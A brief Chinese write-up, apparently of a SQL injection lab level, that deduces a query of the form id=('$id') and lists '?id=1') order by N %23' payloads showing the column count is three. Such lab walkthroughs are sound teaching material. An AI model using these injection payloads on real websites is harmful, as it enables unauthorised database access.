单引号被一对单引号包围,判断sql中id参数是字符串型,且被小括号包围
猜测sql语句为:"SELECT * FROM table_name WHERE id=(‘$id‘) LIMIT 0,1"
|
?id=1‘) order by 1 %23 |
正常 |
|
?id=1‘) order by 2 %23 |
正常 |
|
?id=1‘) order by 3 %23 |
正常 |
|
?id=1‘) order by 4 %23 |
报错 |
得到列数为3列
第四题与第三题类型相同,将单引号换为双引号即可。
原文:https://www.cnblogs.com/a-qi/p/13160431.html